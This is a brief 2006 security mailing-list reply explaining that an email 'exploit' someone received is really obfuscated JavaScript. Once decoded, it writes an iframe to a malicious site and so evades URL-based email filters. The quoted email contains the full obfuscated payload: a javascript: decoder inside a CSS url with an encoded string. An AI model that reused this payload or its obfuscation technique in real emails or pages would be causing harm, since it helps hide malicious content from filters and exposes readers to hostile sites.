On Fri, 17 Feb 2006 gandalf@xxxxxxxxxxx wrote: > I just receieved this exploit, I have looked around and all I could find > lately are the following Java issues: Gentoo Linux Security Advisory > GLSA 200601-10 - Sun and Blackdown Java: Applet privilege escalation > I don't have the Java knowledge to figure out what is going on, but it > doesn't look good. it's not a javascript exploit, it's obfuscated javascript. basially it decodes itself to display something along the lines of (tags obscured): [iframe src=http://badsite/some/dir/stuff] [/iframe] this can be used to bypass filters that look in your email for known undesirable sites. nothing special about it, and no exploit. > <a target=3D"_blank" href=3D"www.yahoo.com>"style=3D"background:url\(java/**/script:function dc(x){var l=3Dx.length,b=3D1024,i,j,r,p=3D0,s=3D0,w=3D0,t=3DArray(63,6,22,2,4,19,56,49,24,46,0,0,0,0,0,0,61,0,5,58,48,51,17,18,13,16,11,20,27,47,60,53,8,57,14,7,9,55,36,31,1,40,15,0,0,0,0,44,0,33,41,52,62,32,50,28,43,10,21,12,26,42,59,38,39,34,29,23,45,3,37,25,30,35,54);for(j=3DMath.ceil(l/b);j>0;j--){r=3D'';for(i=3DMath.min(l,b);i>0;i--,l--){w|=3D(t[x.charCodeAt(p++)-48])<<s;if(s){r+=3DString.fromCharCode(165^w&255);w>>=3D8;s-=3D2}else{s=3D6}}document.write(r)}}dc('wfNDs5kfAsYOsLkoHSrcj0bqiRbvJGbvF96vK3Qqrzbq4h8aHukE3Ugc82waGEgDFUkoj9woifNDs5kfAMT'))"> ________ jose nazario, ph.d. jose@xxxxxxxxxx http://monkey.org/~jose/ http://infosecdaily.net/ http://www.wormblog.com/
